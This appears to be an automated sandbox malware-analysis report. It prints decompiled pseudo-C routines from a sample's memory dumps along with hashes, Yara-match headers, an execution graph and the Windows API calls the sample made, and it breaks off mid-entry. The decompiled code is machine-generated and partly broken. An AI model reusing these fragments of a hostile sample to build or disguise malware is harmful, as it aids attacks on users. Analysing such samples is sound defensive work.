                                                                                                                				_t118[1] = _t89[1] & 0xff00ff00 | _t89[1] & 0x00ff00ff;
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_t118[2] = _t89[2] & 0xff00ff00 | _t89[2] & 0x00ff00ff;
                                                                                                                				_t69 =  &(_t118[1]);
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_t118[3] = _t89[3] & 0xff00ff00 | _t89[3] & 0x00ff00ff;
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_t118[4] = _t89[4] & 0xff00ff00 | _t89[4] & 0x00ff00ff;
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_t118[5] = _t89[5] & 0xff00ff00 | _t89[5] & 0x00ff00ff;
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_t118[6] = _t89[6] & 0xff00ff00 | _t89[6] & 0x00ff00ff;
                                                                                                                				asm("ror esi, 0x8");
                                                                                                                				asm("rol ecx, 0x8");
                                                                                                                				_t118[7] = _t89[7] & 0xff00ff00 | _t89[7] & 0x00ff00ff;
                                                                                                                				if(_a20 != 0x100) {
                                                                                                                					L5:
                                                                                                                					return _t69 | 0xffffffff;
                                                                                                                				} else {
                                                                                                                					_t184 = _a4;
                                                                                                                					_t76 = 0;
                                                                                                                					_a12 = 0;
                                                                                                                					while(1) {
                                                                                                                						_t162 =  *(_t69 + 0x18);
                                                                                                                						_t102 = ( *(_t184 + 4 + (_t162 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t184 +  &(_t76[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t184 + 4 + (_t162 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t184 + 5 + (_t162 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t184 + 4 + (_t162 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t69 - 4);
                                                                                                                						_t135 =  *_t69 ^ _t102;
                                                                                                                						 *(_t69 + 0x1c) = _t102;
                                                                                                                						_t104 =  *(_t69 + 4) ^ _t135;
                                                                                                                						 *(_t69 + 0x20) = _t135;
                                                                                                                						_t137 =  *(_t69 + 8) ^ _t104;
                                                                                                                						 *(_t69 + 0x24) = _t104;
                                                                                                                						 *(_t69 + 0x28) = _t137;
                                                                                                                						if(_t76 == 6) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t114 = ( *(_t184 + 4 + (_t137 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t184 + 4 + (_t137 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t184 + 4 + (_t137 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t184 + 5 + (_t137 & 0x000000ff) * 4) & 0x000000ff ^  *(_t69 + 0xc);
                                                                                                                						_t141 =  *(_t69 + 0x10) ^ _t114;
                                                                                                                						 *(_t69 + 0x2c) = _t114;
                                                                                                                						_t116 =  *(_t69 + 0x14) ^ _t141;
                                                                                                                						 *(_t69 + 0x34) = _t116;
                                                                                                                						_t76 =  &(_a12[0]);
                                                                                                                						 *(_t69 + 0x30) = _t141;
                                                                                                                						 *(_t69 + 0x38) = _t116 ^ _t162;
                                                                                                                						_t69 = _t69 + 0x20;
                                                                                                                						_a12 = _t76;
                                                                                                                						if(_t76 < 7) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					return 0xe;
                                                                                                                				}
                                                                                                                				L7:
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bc61e76ea3e79533e31c83d56c90e2b10c5e114c50a1f86292c337f464773164
                                                                                                                • Instruction ID: c52b90075a256842ba2e603c9bf2bbc069e44e30dcc234962402aadc0841d6ed
                                                                                                                • Opcode Fuzzy Hash: bc61e76ea3e79533e31c83d56c90e2b10c5e114c50a1f86292c337f464773164
                                                                                                                • Instruction Fuzzy Hash: 9B5190B3E14A214BD318CE09CC50631B692EFD8312B5F81BEDD199B357CA34E9529B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00E53899(signed char* __eax, void* __edi) {
                                                                                                                				signed char* _t38;
                                                                                                                				unsigned int _t66;
                                                                                                                				unsigned int _t74;
                                                                                                                				unsigned int _t82;
                                                                                                                				unsigned int _t89;
                                                                                                                				signed char _t95;
                                                                                                                				signed char _t98;
                                                                                                                				signed char _t101;
                                                                                                                
                                                                                                                				_t38 = __eax;
                                                                                                                				_pop(_t39);
                                                                                                                				asm("movnti [ecx+0x34], esi");
                                                                                                                				asm("repne push edi");
                                                                                                                				_t66 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
                                                                                                                				_t95 = __eax[0xb];
                                                                                                                				if((_t95 & 0x00000001) != 0) {
                                                                                                                					_t66 = _t66 | 0x80000000;
                                                                                                                				}
                                                                                                                				_t38[0xc] = _t66 >> 0x18;
                                                                                                                				_t38[0xf] = _t66;
                                                                                                                				_t38[0xd] = _t66 >> 0x10;
                                                                                                                				_t74 = ((((_t38[8] & 0x000000ff) << 0x00000008 | _t38[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t38[0xa] & 0xff) << 0x00000007 | (_t95 & 0x000000ff) >> 0x00000001;
                                                                                                                				_t98 = _t38[7];
                                                                                                                				_t38[0xe] = _t66 >> 8;
                                                                                                                				if((_t98 & 0x00000001) != 0) {
                                                                                                                					_t74 = _t74 | 0x80000000;
                                                                                                                				}
                                                                                                                				_t38[8] = _t74 >> 0x18;
                                                                                                                				_t38[0xb] = _t74;
                                                                                                                				_t38[9] = _t74 >> 0x10;
                                                                                                                				_t82 = ((((_t38[4] & 0x000000ff) << 0x00000008 | _t38[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t38[6] & 0xff) << 0x00000007 | (_t98 & 0x000000ff) >> 0x00000001;
                                                                                                                				_t101 = _t38[3];
                                                                                                                				_t38[0xa] = _t74 >> 8;
                                                                                                                				if((_t101 & 0x00000001) != 0) {
                                                                                                                					_t82 = _t82 | 0x80000000;
                                                                                                                				}
                                                                                                                				_t38[4] = _t82 >> 0x18;
                                                                                                                				_t38[7] = _t82;
                                                                                                                				_t38[5] = _t82 >> 0x10;
                                                                                                                				_t89 = (((_t38[1] & 0x000000ff) << 0x00000008 | _t38[2] & 0x000000ff) & 0x00ffffff | ( *_t38 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t101 & 0x000000ff) >> 0x00000001;
                                                                                                                				 *_t38 = _t89 >> 0x18;
                                                                                                                				_t38[1] = _t89 >> 0x10;
                                                                                                                				_t38[6] = _t82 >> 8;
                                                                                                                				_t38[2] = _t89 >> 8;
                                                                                                                				_t38[3] = _t89;
                                                                                                                				return _t38;
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fcf0feeb9e6b2d39b635bf5971bcdeeba4c07f97f5899cffbbdd54775a4d1178
                                                                                                                • Instruction ID: 27160a0f4b85dbc697a95509d9c0906f71ef52de9d1262af8d5e48da8c31e9c4
                                                                                                                • Opcode Fuzzy Hash: fcf0feeb9e6b2d39b635bf5971bcdeeba4c07f97f5899cffbbdd54775a4d1178
                                                                                                                • Instruction Fuzzy Hash: B83193516586F14ED30E836D48B9675AED18E9720274EC2FEDADA6F2F3C0888409D3A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E538A3(signed char* __eax) {
                                                                                                                				signed char* _t37;
                                                                                                                				unsigned int _t65;
                                                                                                                				unsigned int _t73;
                                                                                                                				unsigned int _t81;
                                                                                                                				unsigned int _t88;
                                                                                                                				signed char _t94;
                                                                                                                				signed char _t97;
                                                                                                                				signed char _t100;
                                                                                                                
                                                                                                                				_t37 = __eax;
                                                                                                                				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
                                                                                                                				_t94 = __eax[0xb];
                                                                                                                				if((_t94 & 0x00000001) != 0) {
                                                                                                                					_t65 = _t65 | 0x80000000;
                                                                                                                				}
                                                                                                                				_t37[0xc] = _t65 >> 0x18;
                                                                                                                				_t37[0xf] = _t65;
                                                                                                                				_t37[0xd] = _t65 >> 0x10;
                                                                                                                				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
                                                                                                                				_t97 = _t37[7];
                                                                                                                				_t37[0xe] = _t65 >> 8;
                                                                                                                				if((_t97 & 0x00000001) != 0) {
                                                                                                                					_t73 = _t73 | 0x80000000;
                                                                                                                				}
                                                                                                                				_t37[8] = _t73 >> 0x18;
                                                                                                                				_t37[0xb] = _t73;
                                                                                                                				_t37[9] = _t73 >> 0x10;
                                                                                                                				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
                                                                                                                				_t100 = _t37[3];
                                                                                                                				_t37[0xa] = _t73 >> 8;
                                                                                                                				if((_t100 & 0x00000001) != 0) {
                                                                                                                					_t81 = _t81 | 0x80000000;
                                                                                                                				}
                                                                                                                				_t37[4] = _t81 >> 0x18;
                                                                                                                				_t37[7] = _t81;
                                                                                                                				_t37[5] = _t81 >> 0x10;
                                                                                                                				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
                                                                                                                				 *_t37 = _t88 >> 0x18;
                                                                                                                				_t37[1] = _t88 >> 0x10;
                                                                                                                				_t37[6] = _t81 >> 8;
                                                                                                                				_t37[2] = _t88 >> 8;
                                                                                                                				_t37[3] = _t88;
                                                                                                                				return _t37;
                                                                                                                			}












                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                • Instruction ID: 3d527ac528494b37bbf9d9a6f622762356ec6a236b1416f7b293200436ac6dd6
                                                                                                                • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                • Instruction Fuzzy Hash: C33172516587F14ED31E836D08BD675AED18E9720274EC2FEDADA6F2F3C4888408D3A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E706A3(char* _a4) {
                                                                                                                				signed int _t30;
                                                                                                                				signed int _t35;
                                                                                                                				signed int _t36;
                                                                                                                				signed int _t55;
                                                                                                                				intOrPtr _t56;
                                                                                                                				signed int _t66;
                                                                                                                				intOrPtr _t67;
                                                                                                                				char* _t68;
                                                                                                                				signed int _t78;
                                                                                                                				signed int _t80;
                                                                                                                
                                                                                                                				_t68 = _a4;
                                                                                                                				if(_t68 != 0) {
                                                                                                                					if( *_t68 == 0) {
                                                                                                                						_t2 = _t68 + 4; // 0xfffd5885
                                                                                                                						_t35 =  *_t2;
                                                                                                                						 *_t68 = 1;
                                                                                                                						_t56 =  *0x7ffe0018;
                                                                                                                						_t67 =  *0x7ffe001c;
                                                                                                                						if(_t35 == 0) {
                                                                                                                							_t36 =  *0x7ffe0014;
                                                                                                                							do {
                                                                                                                							} while (_t56 != _t67);
                                                                                                                						} else {
                                                                                                                							_t80 =  *0x7ffe0014;
                                                                                                                							do {
                                                                                                                							} while (_t56 != _t67);
                                                                                                                							_t36 = _t35 * _t80;
                                                                                                                						}
                                                                                                                						 *(_t68 + 8) = _t36;
                                                                                                                						 *(_t68 + 0xc) = 0x7b9;
                                                                                                                						 *(_t68 + 0x10) = 0x6ccf;
                                                                                                                						 *(_t68 + 0x14) = 0xa7d;
                                                                                                                					}
                                                                                                                					_t7 = _t68 + 8; // 0xfc33bff
                                                                                                                					_t55 = ( *_t7 << 0x00000012 ^  *_t7 >> 0x00000007) & 0x0007ffff ^  *_t7 << 0x00000012 ^  *_t7 >> 0x0000000d;
                                                                                                                					_t8 = _t68 + 0xc; // 0x1c084
                                                                                                                					_t66 = ( *_t8 >> 0x00000019 ^  *_t8 * 0x00000004) & 0x0000001f ^  *_t8 >> 0x0000001b ^ _t20 + _t20 + _t20 + _t20;
                                                                                                                					_t10 = _t68 + 0x10; // 0x38e85000
                                                                                                                					_t23 =  *_t10;
                                                                                                                					_t11 = _t68 + 0x14; // 0x8b000121
                                                                                                                					_t78 = ( *_t10 >> 0x00000008 ^  *_t10 << 0x00000007) & 0x000007ff ^  *_t10 >> 0x00000015 ^ _t23 << 0x00000007;
                                                                                                                					_t12 = _t68 + 0x14; // 0x8b000121
                                                                                                                					_t13 = _t68 + 0x14; // 0x8b000121
                                                                                                                					_t30 = ( *_t11 << 0x0000000d ^  *_t11 >> 0x00000009) & 0x000fffff ^  *_t12 >> 0x0000000c ^  *_t13 << 0x0000000d;
                                                                                                                					 *(_t68 + 0x14) = _t30;
                                                                                                                					 *(_t68 + 0x10) = _t78;
                                                                                                                					 *(_t68 + 8) = _t55;
                                                                                                                					 *(_t68 + 0xc) = _t66;
                                                                                                                					return (_t30 ^ _t78 ^ _t66 ^ _t55) >> 1;
                                                                                                                				} else {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                			}














                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 324750c234218eeb603b734050768f4d4c37e7fb986e1d53e48197728d8f51d7
                                                                                                                • Instruction ID: 15ef4c599e7592b7d0c6372a85701fa716ee48e82c0f63e34db45a3de66fd396
                                                                                                                • Opcode Fuzzy Hash: 324750c234218eeb603b734050768f4d4c37e7fb986e1d53e48197728d8f51d7
                                                                                                                • Instruction Fuzzy Hash: 9831AE72B106269BD754CE7AD880656B7E2FB88320B54C639D918D3B40E774F961CBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce7b95639ab056b4777caf7d4c95a9b735b66bdf00c3a572d17d5c4be402346a
                                                                                                                • Instruction ID: 26000f779729e5337aaa6a6889dc0da0288c2deb82376a3cf7801f0511ca2d4c
                                                                                                                • Opcode Fuzzy Hash: ce7b95639ab056b4777caf7d4c95a9b735b66bdf00c3a572d17d5c4be402346a
                                                                                                                • Instruction Fuzzy Hash: A331E072B006118FD75CCF45D494B66B793ABC8364B5AC2BDCE1A5B3A1CA74AD10CBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E00E51B7A(void* __eflags, void* _a8) {
                                                                                                                				void* _v0;
                                                                                                                
                                                                                                                				asm("repe sub al, [ecx-0xa]");
                                                                                                                				if (__eflags != 0) goto L12;
                                                                                                                			}





                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 15e4c654d2c96c63ace2679b13f9f3be7f6346964235f1771fa5b7c7a825576b
                                                                                                                • Instruction ID: 6b7ce18a2ad55d55cc9e236e06088aa6c0f8f9c7112d7063930e473f714ddc32
                                                                                                                • Opcode Fuzzy Hash: 15e4c654d2c96c63ace2679b13f9f3be7f6346964235f1771fa5b7c7a825576b
                                                                                                                • Instruction Fuzzy Hash: 3F21DF72B00A114FD75C8E99D49456AB793ABC8214B4AC2BDCE2A9B3D1C574E921C7C0
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 6.7%
Dynamic/Decrypted Code Coverage: 1.5%
Signature Coverage: 2.1%
Total number of Nodes: 1085
Total number of Limit Nodes: 128
32752 2a6ac36 32749->32752 32751 2a67430 10 API calls 32750->32751 32750->32752 32751->32750 32752->32528 32753->32528 32754->32528 32756 2a60d35 32755->32756 32757 2a5b4b0 LdrLoadDll 32756->32757 32758 2a60d9a 32757->32758 32759 2a5b4b0 LdrLoadDll 32758->32759 32760 2a60de8 32759->32760 32761 2a5e7e0 2 API calls 32760->32761 32762 2a60e2f 32761->32762 32763 2a60e36 32762->32763 32764 2a6ac80 3 API calls 32762->32764 32763->32534 32765 2a60e44 32764->32765 32766 2a60e4d 32765->32766 32767 2a5b4b0 LdrLoadDll 32765->32767 32766->32534 32769 2a60e9c 32767->32769 32768 2a6ab20 10 API calls 32768->32769 32769->32768 32771 2a60f21 32769->32771 32789 2a60450 32769->32789 32773 2a60f79 32771->32773 32800 2a607b0 32771->32800 32774 2a6e370 2 API calls 32773->32774 32775 2a60f80 32774->32775 32775->32534 32777 2a60a06 32776->32777 32786 2a60a11 32776->32786 32778 2a6e450 2 API calls 32777->32778 32778->32786 32779 2a60a27 32779->32536 32780 2a5e7e0 2 API calls 32780->32786 32781 2a60ce0 32782 2a60cf9 32781->32782 32783 2a6e370 2 API calls 32781->32783 32782->32536 32783->32782 32784 2a6ab20 10 API calls 32784->32786 32785 2a5b4b0 LdrLoadDll 32785->32786 32786->32779 32786->32780 32786->32781 32786->32784 32786->32785 32787 2a60450 11 API calls 32786->32787 32788 2a607b0 10 API calls 32786->32788 32787->32786 32788->32786 32790 2a60476 32789->32790 32791 2a67430 10 API calls 32790->32791 32792 2a604d2 32791->32792 32793 2a63780 10 API calls 32792->32793 32794 2a604dd 32793->32794 32796 2a60660 32794->32796 32798 2a604fb 32794->32798 32795 2a60645 32795->32769 32796->32795 32807 2a60320 11 API calls 32796->32807 32798->32795 32806 2a60320 11 API calls 32798->32806 32801 2a607d6 32800->32801 32802 2a67430 10 API calls 32801->32802 32803 2a60847 32802->32803 32804 2a63780 10 API calls 32803->32804 32805 2a60852 32804->32805 32805->32771 32806->32798 32807->32796 32808->32332 32809->32347 32810->32345 32811->32339
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,00000000), ref: 02A632E1
                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02A6331E
                                                                                                                • FindClose.KERNEL32(?), ref: 02A63329
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 3541575487-0
                                                                                                                • Opcode ID: 9559b0f6737681a7ae24af58728e0f369c466f2328b56c4012da8effc699822f
                                                                                                                • Instruction ID: e9875173a5d30a2a91ac5c91a0de1ed248bd446a3826b8ddf1e18f1ff6193c4a
                                                                                                                • Opcode Fuzzy Hash: 9559b0f6737681a7ae24af58728e0f369c466f2328b56c4012da8effc699822f
                                                                                                                • Instruction Fuzzy Hash: 15318575940249ABDB20DB64CD85FFF7779AF84B04F1445D8E908A7180DF70AA858BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,00000000), ref: 02A632E1
                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02A6331E
                                                                                                                • FindClose.KERNEL32(?), ref: 02A63329
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 3541575487-0
                                                                                                                • Opcode ID: f22d47e0f5640593ca4081b93b98fcae386712108b33a384c9fa8dc5bf3fcaae
                                                                                                                • Instruction ID: e0677237eaa4d952e670b8fa8517ef7a95ee31c06b389838f8f1f3d9739a8889
                                                                                                                • Opcode Fuzzy Hash: f22d47e0f5640593ca4081b93b98fcae386712108b33a384c9fa8dc5bf3fcaae
                                                                                                                • Instruction Fuzzy Hash: 7B318571940249BBDB20DB64CD89FFF777DEF84B04F144598B908A7180DFB0AA858BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,02A6759C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A6759C,?,00000000,00000060,00000000,00000000), ref: 02A6C81D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ee5915a32a84439ea0eaef9c8393fecbd1f93d3afcde83d62f03af28f498007b
                                                                                                                • Instruction ID: 45dea1d0f6fa2536619dd1fd4b012509cad83c19769aaefc3dd00a216b28822f
                                                                                                                • Opcode Fuzzy Hash: ee5915a32a84439ea0eaef9c8393fecbd1f93d3afcde83d62f03af28f498007b
                                                                                                                • Instruction Fuzzy Hash: 4901AFB2200108AFCB58CF99DC85EEB37AAAF8C354F158208BA0D97241D630E951CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,02A6759C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A6759C,?,00000000,00000060,00000000,00000000), ref: 02A6C81D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                • Instruction ID: c2cc2eac8285d8a08c5a1d0fd2321d07b2d7031266d9142af53c768ee546c744
                                                                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                • Instruction Fuzzy Hash: 70F06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158248BA0997241D630F8518BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID: T
                                                                                                                • API String ID: 2340568224-3187964512
                                                                                                                • Opcode ID: e649de2fd984051d42af6a4735d6d1a831587877ba273ea6f9934422591156a8
                                                                                                                • Instruction ID: 8616f12ea2185d3237a511467a3656edc66afcfca6d6049eb5edf082ecef6c6d
                                                                                                                • Opcode Fuzzy Hash: e649de2fd984051d42af6a4735d6d1a831587877ba273ea6f9934422591156a8
                                                                                                                • Instruction Fuzzy Hash: 7CA1A1B1D40219AFDB14DFA4CD85FEFB7BAAF48304F044569E909A6140EF34A644CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(02A67760,02A62C2C,FFFFFFFF,02A6724A,00000002,?,02A67760,00000002,02A6724A,FFFFFFFF,02A62C2C,02A67760,00000002,00000000), ref: 02A6C8C5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                • Instruction ID: 57558e84627075d3c22face9e723ae629212660d6839fb74e77cb235c04ddcda
                                                                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                • Instruction Fuzzy Hash: 35F0A4B2200208ABCB14DF99DC84EEB77ADEF8C754F118248BA0D97241D630E8118BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,02A517C4,00000004,00001000,00000000), ref: 02A6C9E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                • Instruction ID: 57a3169bbbb210e4f8fe40cb5563f63dea79a0967d53bf39dde9350252146cc2
